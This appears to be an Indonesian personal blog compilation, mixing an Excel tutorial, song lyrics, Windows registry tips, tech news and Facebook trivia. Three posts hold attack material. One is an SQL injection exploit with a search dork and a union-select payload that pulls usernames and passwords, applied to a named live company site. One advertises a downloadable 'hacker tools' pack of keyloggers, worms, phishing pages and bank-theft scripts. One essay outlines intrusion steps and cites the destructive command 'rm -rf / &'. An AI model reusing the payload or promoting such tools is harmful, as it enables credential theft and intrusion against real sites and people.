Aditz XI IPS 2

Cara Pengoperasian MS.Excel

2010-09-27T04:56:00.000-07:00

Buka MS.Excel mu !

1. title bar: judul nama buku kerja (workbook)
2. pull-down: menu dalam betuk text yang pada salah satu hurufnya terdapat garis bawah
3. pointer: penunjuk posisi sel
4. toolbar ikon: kelompok ikon-ikon (perintah dalam bentuk gambar)yang mempermudah dan mempercepat perintah
5. worksheet: lembar kerja microsoft excel,dalam kondisi default terdapat 3 sheet
6. scroll bar vertical: penggulung layar vertikal
7. scroll bar horizontal: penggulung layar horizontal
8. scroll bar top: penggulung layar keatas
9. scroll bar bottom: penggulung layar kebawah
10. scroll bar right: penggulung layar kekanan
11. scroll bar left: penggulung layar kekiri
12. taks pane: daftar menu untuk membuka dan membuat file baru

b. lembar kerja microsoft excel

Beberapa istilah penting yang harus diketahui:
1.cell:perpotongan kolom dan baris,misalnya A1
2.Range:gabungan beberapa cell
3.column:kolom lembar kerja excel berjumlah 256 kolom yaitu dari kolom A
s/d IV
4.row: baris lembar kerja excel berjumlah 655326 baris

Fungsi menu pull-down:
1. file: menu yang terdiri atas pengorganisasian file
2. edit : menu yang terdiri atas oprasi pengeditan sheet
3. view : menu yang berhubungan dengan tampilan layout dalam lembar kerja
4. insert : menu yang berhubungan dengan penyisipan, baik dalam lembar kerja maupun dari objek lain.
5. format : menu yang mengatur segala keperluan dasar untuk lembar kerja
6. tools : menu perlengkapan lainnya yang dapat memaksimalkan lembar kerja excel
7. data : menu yang berhubungan dengan pengolahan data dalam lembar kerja
8. window : menu yang berfungsi untuk pengaturan jendela kerja excel
9. help : menu bantuan yang dapat digunakan untuk membantu bila terjadi suatu kesalahan penggunaan, memberi informasi kepada pengguna computer terhadap perintah tertentu.

c .pembuatan lebar kerja dengan Microsoft excel

pembuatan lembar kerja baru:
1. klik menu file.
2. klik new.
3. klik blank workbook atau klik icon new.
4. selanjutnya anda dapat mulai bekerja dengan lembar kerja excel.

Penyimpanan lembar kerja :
1. klik menu file
2. klik save atau klik icon save , hingga tampil kotak dialog save as
3. tentukan directory penyimpanan pada kotak save in:
4. isi nama file pada kotak file name:
5. pilih tipe dokumen yang akan disimpan pada kotak save as type:
6. klik save .

penutupan buku kerja :
1. klik menu file
2. klik close
3. maka akn muncul kotak dialog :jawab yes,jika aka menyimpan kembali.jawab no,ika tidak ingin menyimpan kembali.jawab cancel,jika ingin membatalkan untuk menyimpan file

pembukaaan lembar kerja:
1. klik menu file
2. klik open atau klik ikon open, hingga tampil kotak dialog open
3. tentukan directory file yang akan dibuka pada kotak look in:
4. tentukan tipe file yang akan dibuka pada kotak files of type:
5. klik nama file atau ketik pada kotak file name:
6. klik open

menyimpan lembar kerja dengan nama file yang berbeda:
1. klik menu file
2. klik save as
3. tentukan directory penimpanan pada kotak save in:
4. isi nama file baru pada kotak file name, misalnya latihan 1-revisi
5. klik save

penggabungan dua lembar kerja atau lebih:
1. tekan tombol ctrl pada keyboard
2. klik sheet yang akan digabungkan
3. pada title bar akan tercantum tulisan group, yang menandakan bahwa sheet telah dapat digunakan secara bersama-sama
4. ketik pada sheet 1.setelah selesai bila anda lihat pada sheet lainnya maka akan terisi dengan data yang sama.

Pemasukan data berupa teks, tanggal dan bilangan:
Jenis data yang dapat anda gunakan adalah sebagai berikut:
• angka (nilai): data yang diawali oleh karakter numeric (0-9), +, -, =, $, #, (, @.
Contoh: 20000+50000
200
(5000+2000)
• teks :data yang diawali oleh karakter selain data angka atau nilai, contohnya: KURIKULUM
• Tanggal :jenis data dalam bentuk tanggal.Contohnya : 12/05/99 dan 5-jan-04
• Jam : jenis data dalam bentuk waktu atau jam. Contoh: 09:55:55

Pemformatan Sel
1.format angka (number)
• Klik menu format.
• Klik cells, hingga tampil kotak dialog Format Cells seperti berikut
• Klik tab number.
• Tentukan category (kategori number yang anda pilih ) dan tabulasi lain yang diperlukan.
• Klik ok.
2.Format alignment (tata cetak teks)
• Klik menu format .
• Klik cells.
• Klik tab alignment, hingga tampil kotak dialog format cells.
• Tentukan format alignment berikut.
• Tentukan :
1. horizontal :perataan teks pada posisi horizontal
2. vertical :perataan teks pada posisi vertical
3. teks Control :fungsi Control teks wrapteks (teks melipat sendiri), shring to fit (menyesuaikan ukuran berdasarkan lebar tinggi sel)
4. orientation: bentuk arah teks (vertical horizontal tau diagonal )
• klik ok.
3.Format font (Huruf)
• klik menu format
• klk cells
• klik tab font, hingga tampil kotak dialog format cells
• tentukan format font berikut.
1. font : jenis huruf yang digunakan
2. font style: model atau style dari huruf yang digunakan
3. size: ukuran huruf yang digunakan.
4. underline: menyertakan garis bawah pada teks
5. color: memberi warna pada teks
6. effects: model efek pencetakan
• klik ok

penggabungan sel
1. blok sel yang akan digabungkan
2. klik menu format
3. klik cells
4. klik tab alignment
5. klik merge cells
6. klik ok

penyembunyian baris
1. letakkan pointer pada baris yang akan disembunyikan
2. klik menu format
3. klik row
4. klik hide(klik unhide untuk memunculkan kembali)

penyembunyian kolom:
1. letakkan pointer pada kolom yang akan disembunyikan
2. klik menu format
3. klik column
4. klik hide (klik unhide untuk memunculkan kembali)

eCatalog [Blind Sql Injection]

2009-10-02T02:58:00.000-07:00

————————————————————————————————————————————————————-

Author : YaDoY666

Contact : YaDoY666[a]ServerIsDown[dot]Org

Group : ServerIsDown

Date : September 27th, 2009

————————————————————————————————————————————————————-

[-] Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Greetz

Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.

By : Yadoy666

Lyric Superman Is Dead - Memories Of Rose

2009-09-26T09:18:00.000-07:00

I think about the end of the world
I’m thinking about you...
All the struggle we had, and the past,
Blood and tears my love !
How could I forget

In sorrow now, since we fell a part
A million miles away
Still I put my faith on high sky
Everlasting pain! How can I escape...

I think about the evil ways I’ve been
The self destruction years...
I disrespect my self and the world
Chase by ghost of lust
Kill the love ones down

Don’t go, don’t go away...
Stay with me here in this lullabies
Darling it won’t be long, till we find
Our away back home again...

I gave up all the poison for you
Gave up the wildest dreams...
And in the end I’ll grow old
With you, only you my love
Burn the fire burns...

At night when the shadow falls
Wish I’m there just right there
Close by your side !
This lonesome dreams, I’m haunted by
The memories of rose...

Gk Penting Gk Usah di Baca

2009-09-26T09:13:00.000-07:00

kuq akhir-akhir ne ane jdi Bosen Blogging..
ne az bingung mo nulis ap..
lbih baik posting dikit dri pd gk posting sama sekali..

Menyembunyikan Tombol Start dgn StartKiller

2009-09-08T06:19:00.000-07:00

Start Killer adalah software kecil untuk menyembunyikan tombol Start yang terletak di pojok kiri bawah.

Saat software tersebut dijalankan, tombol Start akan “menghilang” dari taskbar dan Anda akan mendapat sedikit tambahan ruang pada taskbar.Walaupun tombol Start tidak ada, Anda tetap bisa mengakses Start Menu dengan menekan tombol Ctrl + Esc atau tombol Windows.

Untuk menampilkan kembali tombol Start, Anda harus menutup Start Killer dengan mengklik kanan icon Start Killer pada systray dan klik menu Exit.

Download Start Killer 3.0

Google Browser Internet

2009-09-08T06:15:00.000-07:00

SAN FRANSISCO, SELASA - Perang persaingan dalam layanan Internet antara Microsoft dan Google belum berakhir. Tak lama setelah Microsoft merilis Internet Explorer 8 versi beta 2, Google mengungkapkan browser web yang dikembangkannya.

Browser yang akan diberikan cuma-cuma itu diberi nama Chrome. Perkenalannya ke komunitas maya sangat unik karena menggunakan cerita komik yang lugas dan menjelaskan mengenai browser tersebut secara gamblang.

Mulai Selasa (2/9), aplikasi tersebut direncanakan dapat diunduh (download) di 100 negara dan baru dapat dipakai pada komputer yang menggunakan sistem operasi Windows. Google menyatakan masih mengerjakan versi lainnya untuk dipakai pada sistem operasi Macintosh dari Apple dan Linux.

Dalam blog resmi yang ditulis pejabat Google Senin (1/9), Chrome diklaim menawarkan fasilitas mengakses web lebih baik.Web broser ini menyediakan akses ke berbagai materi multimedia lebih cepat dan nyaman karena telah dilengkapi JavaScript virtual machine yang multiproses. Untuk mencegah phising dan pencurian data web, Chrome juga memiliki fitur membuka aplikasi berbasisi web tanpa toolbar dan address bar yang juga dikembangkan Mozilla dalam proyek yang disebut Prism.

“Web semakin baik dengan lebih banyak pilihan dan inovasi,” ujar Sundar Pichai, wakil presiden untuk manajemen produk Google. Apalagi, aplikasi tersebut dibangun dengan platform open source sehingga lebih fleksibel dikembangkan komunitas.

Masuknya Google ke pasar web browser menandai makin panasnya persaingan di ranah Internet. Sebelumnya Google berupaya menggerus pasar pengguna aplikasi pengolah dokumen dengan memperkenalkan Google Docs yang dapat diakses online. Google juga membatasi dominasi Internet Explorer dengan mendukung browser web Firefox buatan Mozilla yang saat ini telah meraup 10 persen pangsa pasar.

Dengan iming-iming bagi hasil iklan, Mozilla memasang mesin pencarian Google di halaman resminya. Kontrak kerja sama tersebut telah diperpanjang hingga 2011.

Google mungkin berharap dapat meraup pangsa pasar lebih besar dengan produk mereknya sendiri. Namun, nama besar Google di ranah maya bukan jaminan keberhasilan setiap layanannya. Instant messaging Gtalk dan layanan email Gmail sejauh ini masih di bawah layanan serupa dari Yahoo amupun Microsoft. Buakn tidak mungkin, Chrome juga bakal menjadi pesaing baru bagi Firefox.

6 Cara Membuat Komputer Menjadi lebih baik

2009-09-08T05:49:00.000-07:00

Registry dilengkapi dengan berbagai pengaturan yang bermanfaat untuk meningkatkan kinerja, memperbaiki lubang keamanan, dan bahkan mengubah basis fundamental Windows untuk bekerja lebih baik. Walaupun terlihat sangat canggih, Anda tetap perlu untuk berhati-hati dalam menggunakannya karena bukan hanya fitur yang membantu tetapi juga banyak perangkap.

Jika tidak berhati-hati, Anda justru malah menambahkan masalah dari pada memecahkannya. Untuk itu, di bawah ini terdapat 6 Cara yang bisa Anda coba untuk membuat PC Anda menjadi lebih baik. Selamat mencoba!!

1. Tingkatkan Keamanan

Seseorang yang tidak diinginkan bisa dengan mudah mengambil data Anda dengan USB apabila ia berhasil mengakses PC Anda secara fisik. Jika Anda menggunakan Windows XP2 atau versi sesudahnya, ada sebuah cara sederhana untuk mencegahnya.

Masuk ke “HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies“, buatlah sebuah nilai DWORD yang disebut “WriteProtect” dan atur pada nilai “1“. Anda akan bisa membaca drive USB, tetapi tidak bisa memindahkan data ke dalamnya lagi.

2. Kendalikan UAC

Kendali Akun Pengguna milik Vista sangat sering memunculkan peringatan-peringatan yang akhirnya dimatikan oleh para pengguna. Tapi, kadang justru membuat mereka kelewatan fitur-fitur yang bermanfaat seperti mode perlindungan untuk IE. Anda bisa mengendalikannya dengan cara menonaktifkan peringatan bagi administrator, jadi Anda tidak perlu terganggu, namun UAC tetap bekerja pada latar belakang dan Anda masih bisa mendapatkan fitur-fiturnya.

Untuk melakukan ini, masuk ke “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin“, dan atur nilainya menjadi “0″. Untuk mengembalikannya ke kondisi normal, atur nilainya menjadi “2″.

3. Ubah Pemilik

Instalasikan Windows pada PC dan Anda pasti akan diminta untuk memasukan nama, yang kemudian akan disimpan sebagai pemilik yang terdaftar (jalankan WinVer untuk melihat ini pada sistem Anda). Jika Anda membeli sebuah komputer bekas, mungkin Anda ingin mengganti nama pemiliknya dengan nama sendiri. Hmm..tak ada cara lain selain dengan Registry.
br>Masuk ke dalam “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion” dan akan melihat dua kalimat “RegisteredOwner” dan “RegisteredOrganization“. Klik ganda pada keduanya untuk mengganti.

4. Mengurutkan File dengan Benar

Mengurutkan nama file pada Explorer bisa menjadi suatu masalah. Pengaturan awal, ia akan menempatkan “File_v2.txt” sebelum “File_v15.txt”, dan itu bukanlah urutan ASCII, tetapi terlihat lebih masuk akal. Tetapi, bagaimana jika “v” merujuk kepada nomor versi, dan seharusnya “File_v15.txt” di urutan terdahulu? Pada saat ini, sistem awal Explorer tidak bisa bekerja sama sekali.

Untuk mengembalikan pengurutan berdasarkan ASCII yang biasa, masuk ke “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer“, buatlah nilai DWORD yang disebut “NoStrCmpLogical” dan atur nilainya menjadi “1“. Hapus kode tersebut jika ingin kembali ke kondisi awal Explorer yang standar.

5. Troubleshoot Startup

Jika Windows membutuhkan waktu yang terlalu lama untuk start up maupun shut down, kemungkinan ia sedang memiliki maslah. Untuk mengetahui apa yang sedang terjadi kembali masuk “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System“, buatlah sebuah nilai DWORD yang disebut “verbosestatus” dan atur nilainya menjadi “1“. Restart PC Anda dan Windows akan memberitahu Anda apa yang sedang terjadi.

6. Mengatur Tipe-Tipe Folder

Explorer milik Vista akan secara cerdas memilih tipe folder Anda berdasarkan isinya. Tetapi, hal ini berarti folder download Anda akan berubah menjadi folder musik jika Anda mengunduh beberapa MP3. Untuk memperbaiki ini, masuk ke dalam “HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shelf“, hapus subkey “Bags” dan buat yang baru pada lokasi yang sama.

Buatlah kunci bernama “AllFolders” di bawah Bags, dan kunci lain bernama “Shell” di bawahnya lagi. Kemudian klik padanya untuk membuka “HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell“. Klik kanan pada bagian kanan panel, pilih “New | String Value” dan namakan ini “FolderType“. Kemudian, klik ganda pada FolderType dan atur nilainya menjadi “NotSpecified“. Anda masih bisa mengubah tipe folder, tapi Vista tidak akan mengubahnya secara otomatis.

Jaringan Para Gamerz Indonesia

2009-08-21T18:46:00.000-07:00

Woy.. yg merasa gamers sejati, yg mencintai game online maupun offline, Gbung di sini --> www.maniakgame.org <--
disitu kalian bisa sharing pengalaman maen Game Online / Offline..
Info Game ad disana... jdi tunggu apa lagi.. ayoo buruuan gbung...!

Download Super Hacker Tools

2009-08-07T02:40:00.000-07:00

Super Hackers 2009 | Size 67 MB

Contain :
ANON FTP
ARPINJECT
ASPACK21
ATK-2.1
BIOS PASS REMOVER
BLASTERW32
BLUE
BMP RIPPER
BRUTUS
CASXM138
CAYZODQF
CGI FOUNDER
CGIS4
CGI SSCAN
CIA10
CRAAGLE
CRACK FTP
DAVS TR RETAIL
DEEP UN FREEZE
DR VBS
EES BINDER
FTP BR
GENXE
GRINDER 1.1
HACK FLASH TEMPLATE
HACK MY SPACE
HACK PHOTOSHOP CS2
HACKERS ASSISTANT
HACK THE GAME
H C K
HL BOOM
HOTMAIL SCAM PAGE
HYDRA
JOHN
KEY LOGGER
LEGION NETMBIOS SCANNER
MAIL BOMB 2.0 YAHOO
MIDNITE MASSACREN
NFO MAKER
NIMDA
NKEDB
NT PACKER
NTS
NULL ADD FRONTEND
P0KES WORM GEN
PANTHER
PHP BB PASS EXTRACTOR
PHP BB ATACKER
PQWAK2
PROXY PRO
RAINBOW CRACK
RES HACKER
ROCKER
RPC
RPC SCAN
SASSER
SEND MAILER
SHOW PASS
SITE DIGGER
SMBAT-WIN32BIN
SMB DIE
SMB PROXY
SPRUT
STEALTH-HTTP SCANNER
SUPER
TFTPD32
T HUNGTER
TINA SOFT KILL
UNDP FLOOD
ULTRA DOS
VISA SPAM (SCRIPT TO STEAL VISA)
X PASS
YAHOO PASSWORD
ZEHIR
ADDR VIEW
AOL NEW
APP TO SERVICE
ASTAROTH JOINTER
BANK OF AMERICA (SCRIPT TO STEAL BANK)
CABLE MODEM SNIFFER
CAP KEYS DIGITAL
C PORTS
C C GENERATOR
DDL SITES
EBAY
E GOLD
E-MAIL CRACKER
DATABASE DEFACER

FBI - BINDER
FTP BRUTE FORCER
F*CK MAIL BOMBER
PHPBB EXPLOIT PACK
GOOGLE HACKER
HOOK TOOL BOX
HOTMAIL EMAIL HACKER
HOTMAIL HACKER GOLD
HOTMAIL HACK
HSBC-US
IECV
IP2
IP NET INFO
KEY CHANGER
MOORE R PORT SCANNER
MSN FLOODER
MSN ACCOUNT CRACKER
MSN LOADER (MULTI MSN)
NET BIOS SCANNER
NET BIOS NAME SCANNER
NET RES VIEW
NO LIMIT CRACKER
ON-OFF MSN
OS UPDATE HACK
PAY PAL
PC ANY PASS
PHP NUKE HACKER
PHP BB ANNIHILATOR
PHPBB ATTACK
PHPBB BRUTEFORCER
PHPBB_DOS
PHPBBSPAMMER
PHPBB_ATACKER
PHPBB CRACKER
PHP BUG SCAN
PHP FUKER
PHP NUKE BY PASS
PING & NUKES
PORT LISTENER
PROCEXP
PRO MO
PHPBB EMAIL HARVESTER
REMOTE SHUT DOWN
SERVER 2003 KEYGEN
SERVER KILLER
SOURCE CHECKER
SOURCE CODES
SQL SCAN
SUPER SCAN
TRACEROUTE
US FORUM SPAM
US BANK
WIN XP KEY CHANGER
WIN XP ACTIVATOR
WEB CRACKER
WINDOWS HIDE
WIN ADMIN PASS HACK
WIN XP CORPERATE KEYGEN
WIN XP KEY CHANGER
WWW HACK
XP LIZER
WIN XP KEYGEN
WHO IS TD
YAHOO ULTRA CRACKER
and some other extra tools from uploader.

Download: Rapidshare.com

Password Rar: www.dl4all.com

Belajar Menjadi Hacker

2009-08-07T02:19:00.000-07:00

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips ... rvice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, "Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks," fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls ' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai 'root' (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up' operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah 'rm -rf / &'. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan 'rm -rf / &'.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, "To boldly go where no one has gone before".

Rahasia Unik Dalam FaceBook Terungkap

2009-08-07T02:12:00.000-07:00

Ternyata secara tidak sadar di dalam facebook itu terdapat beberapa rahasia lo! Sampai sejauh ini saya nemu 5 rahasia facebook atau sering kita sebut FB. Eits..bukan rahasia seperti ” cara hack facebook/fb” atau “cara merusak facebook orang”. tetapi tips trik ini unik nan kocak loo..hahaha. Artikel ini buat orang-orang yg belum tahu aja. kalo uda tahu, kasih tahu artikel ini ke orang yg belum tahu ya. saya dapat ini dari kaskus.

Oke, berikut ini 5 rahasia unik nan kocak facebook:

1. Konami Code
Pertama klik background terus pencet atas atas bawah bawah kiri kanan kiri kanan b a enter klik
2. Quote rahasia
Buka Friend list punya orang lain (bukan Friendlist punya sendiri) terus pilih View All dan pilih Everyone terus Highlight di paling bawah daftar temennya ada quote rahasia kecil. Kalo ga keliatan coba pencet Ctrl+a
3. Bahasa bajak laut
Scroll sampai paling bawah Page terus klik English(US) (ato Bahasa Indonesia kalo pake Bahasa Indonesia), nanti ada pilihan English (Pirate) yang kocak dipakenya
4. Siapa itu Putnam?
Kalo lagi chatting, kita masukin :putnam: bakal keluar emote dengan gambar muka orang ga jelas. Itu adalah Chris Putnam, ahli software facebook..
5. Little Celtics Fan
Cara untuk liatnya: buka gambar di facebook, klik kanan mouse terus pilih View Image. Delete URL-nya ampe slash, kaya gini contohnya :
http://photos-b.ak.fbcdn.net/hphotos…6.snc1/asd.jpg jadi http://photos-b.ak.fbcdn.net/hphotos…c1/hs006.snc1/

Credit By : Nfs

Trik mempercepat koneksi telkom speedy

2009-07-25T21:42:00.000-07:00

Mungkin banyak kalian semua yang langganan telkom speedy merasa resah (ceileh) karena koneksi speedy yang lambat, well beberapa trik dibawah mungkin bisa mempercepat telkom speedy kita menjadi lumayan cepat, gak janji sih hehe, gak salah dicoba dolo...

Utk mempercepat browsing n donlot dg koneksi speedy bs dipake proxy server. Gw sdh coba terutama donlot dg IDM. Gw bandingin kalo pake/tdk pake proxy speed beda skt (90-100)%. Kalo g’ pake proxy donlot skt (40-50) KB/sec , tp kalo pake bisa (80-90) KB/sec bahkan kalo malam hari (bukan hr libur) rata2 (100-120) KB/sec. . Gw jamin deh. Caranya sbagai brikut:

1, BUKA FIREFOX => TOOL => OPTION => ADVANCED => NETWORK =>SETTING

2. PILIH => MANUAL PROXY CONFIGURATION

3. PILIH => HTTP, MASUKKAN : ” PROXIES.TELKOM.NET.ID ” PILIH => PORT, MASUKKAN :”8080″

4. BERI TD CENTANG (KLIK KIRI) PADA : “USE THIS PROXY …..” AGAR SUBITEM TERCENTANG SEMUA

5. TEKAN “OK”

6. PADA IDM, MASUK KE TAB PROXY. BERI TANDA CENTANG (KLIK KIRI) PADA : ” HTTP PROXY; HTTPS PROXY ; FTP PROXY ” isikan PORT dg : 8080

7. tEKAN OK

atau

